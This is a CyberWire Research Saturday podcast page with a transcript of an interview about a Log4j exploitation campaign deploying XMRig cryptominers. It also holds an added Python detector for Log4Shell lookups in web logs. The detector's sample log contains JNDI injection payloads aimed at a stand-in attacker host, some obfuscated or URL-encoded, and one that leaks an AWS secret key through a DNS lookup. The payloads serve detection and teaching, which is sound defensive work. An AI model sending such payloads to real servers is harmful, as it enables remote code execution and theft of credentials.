CyberWire Daily - 1700 IPs and counting. [Research Saturday]

Episode Date: June 1, 2024

Amit Malik, Director of Threat Research at Uptycs, is sharing their work on "New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware." The Uptycs Threat Research Team has... discovered a large-scale Log4j campaign involving over 1700 IPs, aiming to deploy XMRig cryptominer malware. This ongoing operation was initially detected through the team's honeypot collection, prompting an in-depth analysis of the campaign. The research says "The JNDI plugin is particularly useful to attackers because it allows them not only to fetch the values of environment variables in the target system but also to freely define the URL and protocol resource for the JNDI network connection." The research can be found here: New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware
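The campaign above rides on Log4j's `${jndi:...}` lookup (CVE-2021-44228, "Log4Shell"), and the conversation below makes the practical point that plain request logging on an exposed server is enough to see the attempts: the payload arrives in a header or query string that the application logs. The detector below is an added example for this page, not code from Uptycs or from the episode. It walks combined-format access-log lines, undoes URL encoding and the `${lower:j}` / `${::-j}` obfuscations that attackers use to hide the literal `${jndi:`, and pulls out the JNDI scheme and callback host (the attacker's LDAP/RMI/DNS server). The log lines and the 198.51.100.x / 203.0.113.x addresses are constructed for the example from documentation ranges and are not indicators from the research.

```python
"""Log4Shell lookup detector for web-server request logs.

Added example for this page; it is not code from Uptycs or from the episode.
The access-log lines in SAMPLE_LOG are constructed for the example, and the
203.0.113.x / 198.51.100.x addresses are documentation ranges, not real C2.
"""
import re
import urllib.parse
from typing import Dict, List, Optional

# Log4j 2 resolves ${...} lookups inside logged strings. Exploit payloads
# hide the literal "${jndi:" behind nested lookups that Log4j resolves first:
#   ${lower:J} -> j     ${upper:n} -> N     ${::-j} -> j  (empty key, default "j")
_CASE = re.compile(r"\$\{(lower|upper):([^{}$]*)\}")
_DEFAULT = re.compile(r"\$\{[^{}$]*?:-([^{}$]*)\}")
# Lookups that read the victim's environment; attackers embed them in the
# callback host name so the DNS/LDAP request itself exfiltrates the value.
_ENV = re.compile(r"\$\{((?:env|sys|java|hostName|date):[^{}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+):/*([^}/]*)", re.IGNORECASE)


def normalize(s: str) -> str:
    """Undo URL encoding and the lookup obfuscations above, in the order
    Log4j would resolve them, repeating until nothing changes."""
    for _ in range(3):  # payloads are often double-encoded
        decoded = urllib.parse.unquote(s)
        if decoded == s:
            break
        s = decoded
    prev = None
    while prev != s:
        prev = s
        # keep env/sys lookups visible as <env:NAME> instead of resolving them
        s = _ENV.sub(lambda m: "<" + m.group(1) + ">", s)
        s = _CASE.sub(
            lambda m: m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper(), s)
        s = _DEFAULT.sub(lambda m: m.group(1), s)
    return s


def find_jndi(line: str) -> Optional[Dict[str, object]]:
    """Return the JNDI scheme and callback host found in a log line, or None."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if m is None:
        return None
    return {
        "scheme": m.group(1).lower(),
        "host": m.group(2),
        "exfil_lookup": "<env:" in norm or "<sys:" in norm,
        "normalized": norm,
    }


def scan(lines: List[str]) -> List[Dict[str, object]]:
    """Scan combined-format access-log lines; the first token is the client IP."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = find_jndi(line)
        if hit is not None:
            hit["line"] = n
            hit["client"] = line.split(" ", 1)[0]
            hits.append(hit)
    return hits


def callback_hosts(hits: List[Dict[str, object]]) -> Dict[str, int]:
    """Count callback hosts; these are the attacker-controlled servers to block."""
    counts: Dict[str, int] = {}
    for h in hits:
        counts[str(h["host"])] = counts.get(str(h["host"]), 0) + 1
    return counts


# Constructed sample: one benign request, then four exploitation attempts
# delivered in the User-Agent or the query string (both commonly logged).
SAMPLE_LOG = [
    '10.0.0.5 - - [12/May/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/May/2024:10:01:05 +0000] "GET /login HTTP/1.1" 200 128 "-" '
    '"${jndi:ldap://203.0.113.9:1389/a}"',
    '198.51.100.7 - - [12/May/2024:10:01:09 +0000] "GET /?q=${${lower:J}${upper:n}di:'
    '${::-l}${::-d}${::-a}${::-p}://203.0.113.9:1389/b} HTTP/1.1" 404 0 "-" "curl/8.0"',
    '198.51.100.8 - - [12/May/2024:10:02:41 +0000] "GET / HTTP/1.1" 200 10 "-" '
    '"%24%7Bjndi%3Armi%3A%2F%2F203.0.113.9%3A1099%2Fx%7D"',
    '198.51.100.9 - - [12/May/2024:10:03:00 +0000] "GET / HTTP/1.1" 200 10 "-" '
    '"${jndi:dns://${env:AWS_SECRET_ACCESS_KEY}.203.0.113.9/a}"',
]

if __name__ == "__main__":
    for h in scan(SAMPLE_LOG):
        print(f'line {h["line"]}: {h["client"]} -> {h["scheme"]}://{h["host"]}'
              f'{"  (reads env vars)" if h["exfil_lookup"] else ""}')
    print("callback hosts:", callback_hosts(scan(SAMPLE_LOG)))
```

Matching on the normalized string rather than on the raw line is the point: a rule that only looks for the literal `${jndi:` misses the third and fourth sample lines, which is exactly the kind of evasion that kept Log4Shell scanners busy. Detection is a second line of defence only; as the interview says, upgrading the affected Log4j 2 versions is the fix.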

Transcript
Starting point is 00:00:00 You're listening to the Cyber Wire Network, powered by N2K. Hello, everyone, and welcome to the CyberWire's Research Saturday. I'm Dave Bittner, and this is our weekly conversation with researchers and analysts tracking down the threats and vulnerabilities, solving some of the hard problems, and protecting ourselves in a rapidly evolving cyberspace. Thanks for joining us.
Starting point is 00:01:54 Log4j is a very widely used application, and it came into the light in December 2021, right, because there was a zero-day exploit that was available for this application. That's Amit Malik, Director of Threat Research at Uptycs. The research we're discussing today is titled "New Threat Detected: Inside Our Discovery of the Log4j Campaign and Its XMRig Malware."
Starting point is 00:02:21 Now, it's a logging framework and used by pretty much all of the open source applications, and there are many internal and external applications that companies use. They use this logging framework library, and it's written in Java. During that time in 2021, it made a really big impact, because since it is a very widely used application, something like this in this type of application could create a catastrophic event, right. So from that point
Starting point is 00:03:01 in time, we were actually looking into this, the story, how the story played out for this Log4j exploit. And at that time also, in 2021, we published blogs and publications saying how the attackers are using it. And suddenly in our intelligence system, that we call internally the global threat intelligence system, where we collect data from all closed and open sources, you know, the threat data we collect into our system, and, you know, we were going through the analysis and then suddenly, you know, our eye popped onto this attack chain for Log4j. And then we realized that this is a much larger campaign
Starting point is 00:03:46 than just one or two machines involved. So that's how it came into the light. Well, let's dig into it here. I mean, reading through the research, you all mentioned that you were doing some routine sandbox hunting analysis and you discovered this ongoing live campaign. What was going on here? Yeah, so basically what really happens is that we collect all of this information into our
Starting point is 00:04:13 intelligence systems, right? And then there are multiple components to the intelligence systems. One of the components is a sandbox that processes the malicious samples, and we have honeypot servers also that are part of this intelligence system. So normally what really happens is, like, when we get something inside our honeypot, you know, the servers, then we redirect that to the sandbox, to understand if it is really a malware or not, right? And in the sandbox, we have our tooling running to detect if something is malicious inside a particular piece of code. So essentially what happened is that our honeypot servers were getting hit by these requests that were used to exploit the Log4j exploit. And when we redirected those to our sandbox, then we got an alert that there are a
Starting point is 00:05:06 couple of coin miner alerts that we got. And our team, the analysis team, looks at this data on a daily basis, doing the regular stuff, right? So this is their job, to identify if something is going on, not just specific to Log4j, but to identify the new things that are coming into our systems. And that's where we identified that, okay, this is something that is specific to Log4j, which is basically more than two-year-old stuff. And it is very, very used. Well, let's dig into some of the details here.
Starting point is 00:05:42 I mean, what can you tell us about this particular campaign? So I think when we look at this campaign from the origin of Log4J exploit in 2021, right, so there is not much change in terms of the strategy, the attackers use the coin miners and the ransomware specific binaries to basically infect the vulnerable servers. And in this campaign also, we see that the attackers are using heavily the coin miners. And primarily what we see is that XMRIG is being used as the major utility to mine the coins. Right. And this is in line with the previous attacks that we have seen. The eye-catching thing for us was that since this is a very widespread application and it created lots of noise in 2021,
Starting point is 00:06:39 but there are still so many servers that are vulnerable to this vulnerability, and attackers are using this vulnerability to infect those systems and deploy these coin miners.
Starting point is 00:07:54 Do you have any sense for where this is coming from? So we have done the analysis on the command and control IP addresses. It's hard to say if the attackers are based in that region, but normally it is Europe and Russia. So one of the major command and control servers for this activity, which contributed around 60% of the total campaign activity, that we have highlighted in our blog post as well, is based in an ISP in Europe. So it's hard to say if the attackers are basically of the same origin, but the activity originated from Europe and Russia. And does this seem to be largely opportunistic,
Starting point is 00:08:56 that they're taking advantage of vulnerable systems to do, as you say, just crypto mining? Exactly. I mean, this is not a very sophisticated attack. It is just that, you know, they are looking for Log4j-vulnerable applications and, you know, they're deploying the coin miners to just mine the coins, right? It's not very, I would say,
Starting point is 00:09:20 it's a very sophisticated attack because it's a two-year-old, very popular vulnerability. But again, it's very surprising why there are so many vulnerable systems out there for this very popular vulnerability. Are they making any attempt to hide their actions here or are they being pretty noisy? Yeah, we haven't really seen any effort to hide the tracks.
Starting point is 00:09:44 It's just that they are coming into the system and then taking the advantage of vulnerability just to deploy the XMRig miner, which is also an open source. XMRig is also, it's not something that is very, you know, very private tool used by the attackers. But yeah. Well, let's go through some of the ways
Starting point is 00:10:09 that folks can protect themselves against this. I mean, two years out, I suppose, you know, patch management would be the top of the list. Exactly. I mean, as I said, and you probably also know that it was a very big thing in 2021 when it came out. And Apache Foundation also released the patch for this one at that time. And patch management is the only solution. We have to upgrade the application version to mitigate this.
Starting point is 00:10:45 Is this something also where monitoring your network traffic would be beneficial? Yeah, definitely. It will be helpful. If you have, basically, let's say, an Apache server or some other type of server that is storing the logs of each type of request that is coming to that particular server, then that can give an indication that, hey, you know, somebody is trying to exploit the vulnerability. So
Starting point is 00:11:11 definitely, if there are network-related, you know, security solutions that are deployed, then they should be able to catch it. Or if there is logging enabled on the servers that basically captures the requests that are coming to the servers, then that should also help to identify this attack. It really is remarkable. I think that it's been so long since Log4j came upon the scene here and we've still got these ongoing issues.
Starting point is 00:11:46 From a high level, what do you suppose is going on here? Do you suppose there's just a lot of systems that folks aren't aware of that should be patched that haven't been yet? I think that's what it looks like, Dave, that even though it was a very widespread issue and lots of people were very aware of it, the people that deals with these technologies, but it looks like that there is some part of the person of the world that is not really, either they do not know,
Starting point is 00:12:19 like they are running these applications for these servers and these servers are internet facing or they might not really have looked or given much care to those servers that these servers are exposed to the internet. Our thanks to Amit Malik from Uptix for joining us. The research is titled New Threat Detected Inside Our Discovery of the Log4J Campaign and its XMRig Malware. We'll have a link in the show notes. And now, a message from Black Cloak.
Starting point is 00:13:13 And that's Research Saturday, brought to you by N2K CyberWire. You can find a link and additional resources in the show notes.
Starting point is 00:14:06 We'd love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire at n2k.com.
Starting point is 00:14:52 This episode was produced by Liz Stokes. We're mixed by Elliot Peltzman and Trey Hester. Our executive producer is Jennifer Iben. Our executive editor is Brandon Karp. Simone Petrella is our president. Peter Kilpie is our publisher. And I'm Dave Bittner.
Starting point is 00:15:09 Thanks for listening. We'll see you back here next time.
